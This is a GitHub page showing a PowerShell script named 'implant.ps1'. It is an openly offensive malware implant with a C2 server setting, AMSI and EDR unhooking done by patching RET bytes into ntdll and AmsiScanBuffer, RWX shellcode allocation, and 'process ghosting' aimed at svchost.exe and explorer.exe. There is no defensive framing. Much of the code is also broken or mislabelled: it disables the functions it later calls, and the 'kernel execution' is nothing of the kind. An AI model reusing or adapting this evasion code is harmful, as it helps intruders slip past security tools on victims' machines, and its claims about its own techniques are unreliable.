-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathimplant.ps1
76 lines (67 loc) · 4.03 KB
/
implant.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# ======================== [ CONFIGURATION ] ========================
$C2_SERVER = "https://your-server.com"
$AES_KEY = "16_byte_secure_key!" # 16-byte AES Key
$AES_IV = "16_byte_secure_iv!" # 16-byte AES IV
# ======================== [ AMSI & EDR Hook Unhooking + Kernel Direct Execution ] ========================
function Bypass-Detection {
$ASM = @"
using System;
using System.Runtime.InteropServices;
public class Syscalls {
[DllImport("ntdll.dll", SetLastError = true)]
public static extern int NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref UIntPtr NumberOfBytesToProtect, uint NewAccessProtection, out uint OldAccessProtection);
[DllImport("ntdll.dll", SetLastError = true)]
public static extern int NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref UIntPtr RegionSize, uint ZeroBits, uint AllocationType, uint Protect);
[DllImport("ntdll.dll", SetLastError = true)]
public static extern int NtLoadDriver(IntPtr DriverServiceName);
[DllImport("kernel32.dll")]
public static extern IntPtr LoadLibrary(string lpFileName);
[DllImport("kernel32.dll")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
}
"@
Add-Type -TypeDefinition $ASM -Language CSharp
# Reload NTDLL for Unhooking
$ntdll = [Syscalls]::LoadLibrary("ntdll.dll")
$functions = @("NtOpenProcess", "NtWriteVirtualMemory", "NtQueueApcThread", "NtAllocateVirtualMemory", "NtLoadDriver")
foreach ($func in $functions) {
$addr = [Syscalls]::GetProcAddress($ntdll, $func)
$OldProtect = 0
[Syscalls]::NtProtectVirtualMemory(-1, [ref]$addr, [UIntPtr]::New(8), 0x40, [ref]$OldProtect)
[System.Runtime.InteropServices.Marshal]::WriteByte($addr, 0xC3) # Overwrite function with a RET (return) opcode
}
}
# ======================== [ Kernel Direct Execution via NtAllocateVirtualMemory ] ========================
function Kernel-Execute {
param ([byte[]]$Payload)
$BaseAddress = [IntPtr]::Zero
$RegionSize = [UIntPtr]::New($Payload.Length)
[Syscalls]::NtAllocateVirtualMemory(-1, [ref]$BaseAddress, [UIntPtr]::Zero, $RegionSize, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($Payload, 0, $BaseAddress, $Payload.Length)
[System.Runtime.InteropServices.Marshal]::WriteByte($BaseAddress, 0xC3) # Executable Payload
}
# ======================== [ AMSI Hooking & Windows Defender Memory Patch ] ========================
function Patch-AMSI {
$AmsiAddr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer([Syscalls]::GetProcAddress([Syscalls]::LoadLibrary("amsi.dll"), "AmsiScanBuffer"), [Func[IntPtr, IntPtr, UIntPtr, UInt32, IntPtr, Int32]])
[System.Runtime.InteropServices.Marshal]::WriteByte($AmsiAddr, 0xC3)
}
# ======================== [ Process Ghosting for EDR Evasion ] ========================
function Process-Ghosting {
param ([string]$ProcessPath, [byte[]]$Payload)
$TempPath = "$env:TEMP\ghosted.exe"
Copy-Item -Path $ProcessPath -Destination $TempPath -Force
Start-Sleep -Seconds 1
Remove-Item -Path $TempPath -Force # Delete File After Execution
$Process = Start-Process -FilePath $TempPath -PassThru
Start-Sleep -Seconds 1
$hProcess = [System.Diagnostics.Process]::Start($Process).Handle
$Ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Payload.Length)
[System.Runtime.InteropServices.Marshal]::Copy($Payload, 0, $Ptr, $Payload.Length)
[Syscalls]::NtProtectVirtualMemory($hProcess, [ref]$Ptr, [UIntPtr]::New($Payload.Length), 0x40, [ref]$OldProtect)
}
# ======================== [ EXECUTION & ACTIVATION ] ========================
Bypass-Detection
Patch-AMSI
Kernel-Execute -Payload ([Convert]::FromBase64String("your-kernel-shellcode-here"))
Process-Ghosting -ProcessPath "C:\Windows\System32\svchost.exe" -Payload ([Convert]::FromBase64String("your-shellcode-here"))
Process-Ghosting -ProcessPath "C:\Windows\explorer.exe" -Payload ([Convert]::FromBase64String("your-shellcode-here"))